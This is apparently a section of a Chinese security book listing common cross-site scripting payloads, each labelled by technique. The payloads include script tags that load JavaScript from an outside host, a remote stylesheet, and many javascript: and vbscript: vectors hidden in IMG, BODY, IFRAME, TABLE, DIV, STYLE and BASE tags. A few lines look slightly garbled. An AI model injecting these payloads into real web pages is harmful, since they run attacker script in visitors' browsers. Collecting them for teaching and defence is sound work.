11.1 常见XSS攻击方式

常见的XSS攻击方式列举如下,XSS的攻击方式非常多样,有兴趣的读者可以参考邱永华撰写的《XSS跨站脚本攻击剖析与防御》。

普通的XSS JavaScript注入,代码如下:


<SCRIPT SRC=http://xi.baidu.com/XSS/xss.js></SCRIPT>

IMG标签,代码如下:


<IMG SRC=http://xi.baidu.com/XSS/xss.js></SCRIPT>

IMG标签无分号无引号,代码如下:


<IMG SRC=javascript:alert('XSS')>

fromCharCode函数,代码如下:


<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

BODY BACKGROUND,代码如下:


<BODY BACKGROUND="javascript:alert('XSS')">

BODY标签,代码如下:


<BODY('XSS')>

IMG Lowsrc,代码如下:


<IMG LOWSRC="javascript:alert('XSS')">

BGSOUND,代码如下:


<BGSOUND SRC="javascript:alert('XSS');">

STYLE sheet,代码如下:


<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

远程样式表,代码如下:


<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

IMG VBscript,代码如下:


<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

Iframe标签,代码如下:


<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

Table标签,代码如下:


<TABLE BACKGROUND="javascript:alert('XSS')">

TD标签,代码如下:


<TABLE><TD BACKGROUND="javascript:alert('XSS')">

DIV background-image,代码如下:


<DIV STYLE="background-image: url(javascript:alert('XSS'))">

DIV expression,代码如下:


<DIV STYLE="width: expression_r(alert('XSS'));">

STYLE background-image,代码如下:


<STYLE>.XSS{background-image:url("javascript:alert('XSS')”);}</STYLE><A
CLASS=XSS></A>

STYLE background,代码如下:


<STYLE><STYLEtype="text/css">BODY{background:url("javascript:alert('XSS')")} </STYLE>

使用BASE标签,代码如下:


<BASE HREF="javascript:alert('XSS');//">